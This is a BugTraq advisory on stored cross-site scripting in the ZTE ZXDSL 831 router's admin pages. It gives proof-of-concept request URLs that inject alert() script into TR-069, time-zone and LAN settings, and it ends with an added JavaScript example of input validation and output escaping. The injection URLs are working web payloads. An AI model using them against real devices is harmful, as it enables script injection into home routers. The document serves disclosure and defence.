BugTraq
ZTE ZXDSL 831 Multiple Cross Site Scripting
Nov 06 2014 07:45PM
habte yibelo gmail com
TR-069 Client page: Stored. Executes when users go to http://192.168.1.1/tr69cfg.html

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=4
3200&tr69cAcsURL=http://acs.etc.et:9090/web/tr069%27;alert%280%29;//&tr6
9cAcsUser=cpe&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms
&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=4
3200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe%27;a
lert%280%29;//&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itm
s&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=4
3200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe&tr69
cAcsPwd=cpe%27;alert%280%29;//&tr69cConnReqUser=itms&tr69cConnReqPwd=itm
s&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=4
3200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe&tr69
cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms%27;alert%280%29;/
/&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0%27;alert%280%29;//

Time and date page (/sntpcfg.sntp) - Persistent

http://192.168.1.1/sntpcfg.sntp?ntp_enabled=0&tmYear=2000%27lol&tmMonth=
01&tmDay=01&tmHour=00&tmMinute=30&timezone_offset=+08:00&timezone=Beijin
g,%20Chongqing,%20Hong%20Kong,%20Urumqi%22;alert%280%29;//&use_dst=0&enb
lLightSaving=0

Quick Stats page:

192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMas
k=255.255.255.0&hostname=ZXDSL83C1II';alert(0);//&domainname=home&enblUp
np=1&enblLan2=0

http://192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSu
bnetMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27;alert%280
%29;//&enblUpnp=1&enblLan2=0
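
The two controls that would stop the values listed above, as an added example (not ZTE firmware code and not the reporter's): allowlist validation when a setting is saved, and JavaScript-string escaping when it is rendered. Parameter names come from the advisory's URLs; the rules, the function names, and the premise that stored values end up inside quoted JavaScript string literals (suggested by the `';alert(0);//` values) are assumptions.

```javascript
// Added example, not vendor code. Parameter names come from the advisory's
// URLs; the rules and function names are assumptions.

// Input side: allowlist per setting, applied before the value is stored.
// Passwords (tr69cAcsPwd, tr69cConnReqPwd) cannot be allowlisted this tightly,
// so they rely on the output encoding below.
const RULES = new Map(Object.entries({
  hostname: /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/,
  domainname: /^[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$/,
  tmYear: /^\d{4}$/,
  timezone: /^[A-Za-z0-9 ,.()+:-]{1,64}$/,
  tr69cAcsURL: /^https?:\/\/[A-Za-z0-9.-]+(:\d{1,5})?(\/[A-Za-z0-9._~\/-]*)?$/,
  tr69cAcsUser: /^[A-Za-z0-9._@-]{1,64}$/,
  tr69cConnReqUser: /^[A-Za-z0-9._@-]{1,64}$/,
}));

// Returns the names of parameters whose values fail their rule.
function rejectedParams(queryString) {
  const bad = [];
  for (const [name, value] of new URLSearchParams(queryString)) {
    const rule = RULES.get(name);
    if (rule && !rule.test(value)) bad.push(name);
  }
  return bad;
}

// Output side: encode a stored value for use inside a quoted JS string literal.
// Everything outside a small safe set becomes \uXXXX, so quotes, backslashes,
// "<" and line terminators cannot close the literal or the <script> block.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._-]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Constructed samples: query strings shaped like the ones in the advisory,
// plus one clean request for comparison.
const samples = [
  "action=save&hostname=ZXDSL83C1II%27;alert%280%29;//&domainname=home",
  "tmYear=2000%27lol&timezone=Beijing,%20Chongqing%22;alert%280%29;//",
  "action=save&hostname=ZXDSL83C1II&domainname=home",
];
for (const q of samples) console.log(rejectedParams(q), '<-', q);
console.log(jsStringEscape("cpe';alert(0);//"));
```

Validation alone leaves the password fields uncovered, so the escaping step has to be applied to every stored value the page writes into script.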
